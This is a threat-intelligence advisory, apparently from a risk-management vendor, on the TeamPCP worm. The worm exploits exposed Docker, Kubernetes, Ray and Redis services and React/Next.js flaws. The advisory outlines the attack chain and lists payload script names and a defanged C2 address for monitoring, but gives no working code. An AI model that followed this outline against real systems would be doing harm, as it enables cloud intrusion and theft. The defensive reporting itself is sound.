Executive Summary

The emergence of the TeamPCP worm marks a significant escalation in the threat landscape targeting cloud-native infrastructure. Since late 2025, this highly automated, worm-driven campaign has systematically exploited misconfigured and vulnerable cloud services, including Docker, Kubernetes, Ray, and Redis, as well as critical vulnerabilities in React and Next.js applications, most notably the React2Shell vulnerability (CVE-2025-55182, CVSS 10.0). The operation, attributed to the threat cluster known as TeamPCP (also tracked as DeadCatx3, PCPcat, PersyPCP, and ShellForce), leverages a combination of opportunistic scanning, rapid exploitation, and multi-stage payload delivery to establish a distributed criminal infrastructure. The campaign’s objectives include cryptocurrency mining, data exfiltration, extortion, and the creation of proxy networks for further malicious activity. Organizations with cloud-native deployments are at heightened risk and must take immediate action to audit, patch, and monitor their environments.

Threat Actor Profile

TeamPCP is a sophisticated threat actor group with a history of targeting cloud infrastructure at scale. The group is known for its automation capabilities, rapid weaponization of public exploits, and use of multi-functional malware. TeamPCP operates several aliases, including DeadCatx3, PCPcat, PersyPCP, and ShellForce, and maintains a presence on Telegram, where it publishes stolen data and coordinates criminal activities. The group’s infrastructure is distributed, leveraging compromised hosts as command-and-control (C2) relays, proxies, and scanning nodes. TeamPCP is notable for its use of open-source tools, custom Python scripts, and the Sliver C2 framework, as well as for its ability to monetize access through ransomware, cryptojacking, and data extortion.

Technical Analysis of Malware/TTPs

The TeamPCP campaign employs a modular, worm-like malware architecture designed for rapid propagation and persistence across heterogeneous cloud environments. Initial access is achieved through exploitation of exposed or misconfigured APIs in Docker, Kubernetes, Ray, and Redis, as well as through remote code execution (RCE) vulnerabilities in React and Next.js applications, particularly CVE-2025-55182 and CVE-2025-29927. Automated scanners such as scanner.py and pcpcat.py enumerate public IP ranges, often sourced from the DeadCatx3 GitHub repository, to identify vulnerable targets.

Upon successful exploitation, the worm delivers a base64-encoded payload that downloads and executes additional scripts, including proxy.sh, kube.py, react.py, and mine.sh. These scripts perform environment fingerprinting, credential harvesting, lateral movement, and deployment of proxy and tunneling utilities. In Kubernetes environments, kube.py is used to harvest credentials, enumerate pods and namespaces, and deploy privileged containers for persistence. The malware also establishes outbound connections to C2 infrastructure, such as the node at 67.217.57[.]240, and may deploy cryptocurrency miners or ransomware payloads depending on the environment.

The campaign leverages the Sliver C2 framework for command-and-control, and uses compromised hosts as part of a distributed proxy and scanning network. Data exfiltration is automated, with stolen data published on the ShellForce Telegram channel. The malware is highly evasive, using legitimate cloud APIs and living-off-the-land techniques to blend in with normal operations.

Exploitation in the Wild

Active exploitation of the TeamPCP worm has been observed since December 2025, with initial reconnaissance and tool development traced back to July 2025 via Telegram activity. The campaign is opportunistic, targeting any organization with exposed or misconfigured cloud services, regardless of industry or geography. Victims have been identified in Canada, Serbia, South Korea, the UAE, and the United States, with collateral impact across multiple sectors. The worm’s propagation is automated and environment-aware, enabling it to rapidly compromise large numbers of hosts and establish persistent footholds. Stolen data is routinely published on Telegram, and compromised infrastructure is repurposed for further attacks, including scanning, proxying, and monetization through cryptojacking and extortion.

Victimology and Targeting

The TeamPCP campaign is characterized by its broad, opportunistic targeting of cloud-native environments. Affected organizations include those running Amazon Web Services (AWS), Microsoft Azure, and other public cloud platforms, as well as private cloud deployments. The primary risk factor is the exposure of management APIs or dashboards for Docker, Kubernetes, Ray, and Redis to the public internet, often due to misconfiguration or lack of access controls. Additionally, organizations running vulnerable versions of React and Next.js are at risk of RCE via the React2Shell vulnerability (CVE-2025-55182) and related flaws. The campaign does not appear to be industry-specific, with victims spanning technology, finance, healthcare, and government sectors. The use of automated scanning and exploitation tools enables TeamPCP to rapidly identify and compromise new targets as they become exposed.

Mitigation and Countermeasures

To defend against the TeamPCP worm and similar threats, organizations should immediately audit their cloud environments for exposed or misconfigured APIs and dashboards. Access to Docker, Kubernetes, Ray, and Redis management interfaces should be restricted to trusted networks and protected with strong authentication. All instances of React and Next.js should be updated to address CVE-2025-55182, CVE-2025-29927, and any other known vulnerabilities. Security teams should monitor for the presence of known malware payloads (proxy.sh, scanner.py, kube.py, react.py, pcpcat.py, mine.sh) and for outbound connections to known C2 infrastructure, particularly 67.217.57[.]240. Kubernetes clusters should be inspected for unauthorized privileged pods, and cloud hosts should be checked for unauthorized proxy, tunneling, or mining processes. Network segmentation, least-privilege access, and continuous monitoring are essential to limit the blast radius of any compromise. Incident response plans should be updated to include detection and remediation of cloud-native threats, and organizations are encouraged to leverage threat intelligence feeds and automated security tooling to stay ahead of emerging campaigns.

References

The following sources provide additional technical details and context on the TeamPCP campaign and associated vulnerabilities:

The Hacker News: TeamPCP Worm Exploits Cloud Infrastructure,Flare: TeamPCP Cloud-Native Ransomware,eSecurity Planet: TeamPCP and the Rise of Cloud-Native Cybercrime,Reddit: TeamPCP worm exploits cloud infrastructure,NVD: CVE-2025-55182,GitHub: DeadCatx3

About Rescana

Rescana is a leader in third-party risk management (TPRM) for modern enterprises. Our platform empowers organizations to continuously monitor, assess, and mitigate cyber risks across their digital supply chain and cloud environments. By leveraging advanced threat intelligence and automation, Rescana helps customers stay ahead of emerging threats and maintain robust security postures. For questions or further information, we are happy to assist at ops@rescana.com.